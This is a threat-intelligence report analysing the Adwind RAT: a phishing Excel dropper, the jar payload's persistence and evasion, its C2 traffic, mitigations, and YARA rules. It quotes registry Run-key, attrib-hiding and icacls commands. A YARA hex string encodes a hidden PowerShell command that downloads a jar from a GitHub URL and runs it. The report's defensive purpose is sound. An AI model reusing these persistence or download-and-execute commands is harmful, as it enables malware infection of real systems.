Adwind Rat Technical Analysis Report

ADWIND RAT TECHNICAL ANALYSIS REPORT

CONTENTS

Information about the file paths, registry records, logs and all indicators of Adwind malware type of Remote Access Trojan has been analyzed and reported in detail.

• Introduction
• Rapor.xlsx File Analysis
• Adwind.jar File Analysis
• Adwind.jar Network Analysis
• Solution Proposals
• Yara Rule

Introduction

The developer of the RAT-type Adwind malware is a Mexican-based Spanish hacker and started selling the java-based remote access tool (RAT) called “Frutas” in the Adwind family in early 2012. It was changed at least seven times in the following years and was released under the names Adwind, UnReCoM, Alien Spy, JSocket, JBifrots, UnknownRat and JConnectPro.

Adwind RAT, a cross-platform, multi-functional malware program distributed through a single malware platform, is one of the main features that distinguishes it from other commercial malware, is that it is sold online. It is the clear distribution of the “customer” in the form of a paid service in which he pays a fee for the use of the malicious program. By the end of 2015, the system had approximately 1,800 users. This makes it one of the biggest malware platforms available today.

Between 2013 and 2016, different versions of Adwind were used in attacks against at least 443,000 private users in the world, commercial and non-commercial organizations.

On 11 January 2012, the forum user “indetectables [.] Net” named “adwind” shared an article about “Frutas RAT”. In his article, he wrote that he started the Frutas RAT project and progressed slowly because he did everything alone and did not use any 3rd Party code and used NETBEANS as the development environment. This user in the forum has released several updates for Frutas RAT throughout 2012. Changed the “Frutas RAT” which was free since December 2012 to “Adwind RAT” and made it paid.

Adwind RAT, which was renamed in early 2013, was offered for sale via various communication methods such as Skype or mail. Adwind RAT, which was released with a price of $ 55 at the first exit, has also been stated that the price will increase and be $ 100 as of February 15th. With the update made in 2013, Android support was also provided. Due to its many features and working on most platforms, it has become a very popular tool in a short time. With this popularity, the developer of Adwind RAT opened a Youtube channel and shared information such as how to use the tutorial videos of Adwind RAT through this channel. Adwind RAT was used for the first time in a targeted attack in Pacific Asia. In November 2013, the malware was renamed UNRECOM This rebranded version of Adwind continued to retain all of its old features.

In 2014, Adwind’s source code leaked and became available online for free, in response to the leak, the “official” version of Adwind Trojan was significantly upgraded and re-released as AlienSpy in October 2014. This version of the malware gained various features such as detecting sandboxes, cryptographically secure communication with the control server, and auto-detecting and disabling antivirus programs.

Rapor.xlsx File Analysis

File Name Rapor.xlsx

Md55

ba62c034584b88e44b5364e4131671c

Sha1

b4a8dfe2eebaf436c021458e515baf39ed812740

Sha2569e61a8cf313337d2b72fc463164afc2e332fa26fda145c18fc6de6acd68af7db

Adwind malware comes as an excel file with phishing attacks on the system first. When the excel file sent in addition to the mails with different content sent to the victim was first opened by the victim, an excel file containing the meaningless characters appears with the warning “you have to activate the content”.

After this warning, the excel file requests permission for cmd.exe to run a script code hidden in its sub cells.

This piece of code downloads the actual malicious code via github and runs it without any user permission and opening a console window to the screen. When we look at the hex values of the excel file, this piece of code appears..

This excel file, which is our first harmful file, does not do any harmful operation except for downloading malicious code as dropper task.

Adwind.jar File Analysis

File Name Adwind.jar

Md5 8961392f55bdbfaa48c906ab5594afe3

Sha1 8ca09bebe64bc1f8a2b5e50d4883f81d58a9f9fc

Sha256c52f88bc3da6ce73dbed459115b2fbdfa41effc4313ea6e5cf4a9bb162b916d0

The adwind.jar file, which is our downloaded malicious file, performs the actual malicious processes. First of all, we see that when it is run on the system, it is obfuscate with an allatori tool, which is an obfuscate tool.

It obfuscates itself, making it difficult to detect by anti viruses and analysts. Then makes some checks when he works on the system. These controls are public ip detection and country identification over the network. After passing these controls, it starts its harmful activities on the system.

Firstly, it performs operations such as providing command permanence and providing information to command and control servers by running commands on Shell. For this purpose, it changes the access rights of the directory to access the directory where the java program is installed on the system.

“%WinDir%system32icacls.exe %AllUsersProfile%OracleJava.oracle_jre_usage /grant veryone:(OI)(CI)M”

After getting these permissions, he writes to the beginning so that he can start himself every time the computer is turned on. It selects the ‘Uninstaller’ folder created by the user to the AppData Roaming directory under the home directory.

“reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v JavaSun_Uninstall_00001_00002 /t REG_SZ /d \%ProgramFiles%Javajre1.8.0_251injavaw.exe -jar \%AppData%UninstallUninstall.Uninstaller /f”

After adding itself to the start directory, the hidden file with the parameter “+ h” to hide the directory where it is located from the user with the tool “atrib.exe” in the windows system, to prevent the changes that can be made on the file, to be perceived only as a read and system file with “+ r”. + s” sets it as a system file.

attrib +s +h +r %AppData%Uninstall*.*

attrib +s +h +r %AppData%Uninstall

After these processes, it now ensures its permanence and access on the system.

%ProgramFiles%Javajre1.8.0_251injavaw.exe -jar %AppData%UninstallUninstall.Uninstaller

Our malware uses WMIC.exe to detect AV software running on the system as soon as it starts itself.

WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

After these processes, it hides the “Uninstall” file created by the user in the home directory.

attrib +H %UserProfile%.Uninstall

Adwind.jar Network Analysis

As soon as our malicious file enters the system, it does some checks and collects information. After these controls, he decides to infect the system and communicates with the command and control server.

First, the victim uses amazon’s servers to get the system’s public ip address. It identifies the IP address of the victim system via the address “http://checkip[.]amazonaws [.]com”.

Using the API of “ipinfo [.]io” site, it determines the country where the victim is located. Harmful Turkey’s target is the location, Country code TR is the external work.

After these operations, it performs its harmful activities on the system and it has been determined that it communicates with the command and control server 21736[.]xyz domain.

However, the command and control server is closed.

Solution Proposals

• Use of up-to-date, reliable antivirus software in systems,
• Careful reading of incoming mails does not open without scanning the attachments in it,
• Spam mails were ignored,
• paying attention to phishing sites while browsing the internet,
• Installing the latest updates available in the operating system,
• Monitoring the processes and network movements performed by the running processes on the system
• Filtering IP addresses, domains and addresses of C&C servers that establish harmful connections on the network

These solutions can prevent the Adwind malware of Trojan Rat from infecting and damaging the system.

Yara Rule

import “hash”

rule Rapor: xlsx

{

meta:

description = “Adwind RAT Trojan”

first_date = “13.05.2020”

report_date = “18.07.2020”

file_name = “Rapor.xlsx”

strings:

$s1 = {63 6D 64 03 2F 63 20 70 6F 77 65 72 73 68 65 6C 6C 20 2D 65 78 65 63 75 74 69 6F 6E 70 6F 6C 69 63 79 20 62 79 70 61 73 73 20 2D 57 20 48 69 64 64 65 6E 20 2D 63 6F 6D 6D 61 6E 64 20 22 26 20 7B 20 28 6E 65 77 2D 6F 62 6A 65 63 74 20 53 79 73 74 65 6D 2E 4E 65 74 2E 57 65 62 43 6C 69 65 6E 74 29 2E 44 6F 77 6E 6C 6F 61 64 46 69 6C 65 28 5C 22 68 74 74 70 73 3A 2F 2F 72 61 77 2E 67 69 74 68 75 62 75 73 65 72 63 6F 6E 74 65 6E 74 2E 63 6F 6D 2F 35 33 30 38 36 38 32 2F 34 79 62 61 38 34 34 34 6D 74 63 72 61 31 31 2F 67 68 2D 70 61 67 65 73 2F 77 75 63 67 79 33 6A 65 63 77 67 70 76 2E 73 76 67 5C 22 20 2C 5C 22 20 25 74 6D 70 25 5C 5C 41 43 4A 54 55 2E 6A 61 72 5C 22 29 20 7D 22 20 26 20 25 74 6D 70 25 5C 5C 41 43 4A 54 55 2E 6A 61 72 23 00 15 00 E2 7F 00 00 00 00 0E 59 32 31 35 49 4E 59 46 59 52 46 51 50 45 55}

$s2 = “https://raw.githubusercontent.com/5308682/4yba8444mtcra11/gh-pages/wucgy3jecwgpv.svg”

condition:

hash.md5(0,filesize) == “5ba62c034584b88e44b5364e4131671c” or $s1 or $s2

}

rule Adwind: java

{

meta:

description = “Adwind RAT Trojan”

first_date = “13.05.2020”

report_date = “18.07.2020”

file_name = “Adwind.jar”

strings:

$s1 = “16245”

$s2 = “A$D.class”

$s3 = “A.class”

$s4 = “B.class”

$s5 = “C.class”

$s6 = “D$A.class”

$s7 = “D.class”

$s8 = “u2Br3cvUkb”

$s9 = “c.class”

$s10 = “n.class”

$s11 =”mny\zsh”

condition:

hash.md5(0,filesize) == “8961392f55bdbfaa48c906ab5594afe3” or all of them

}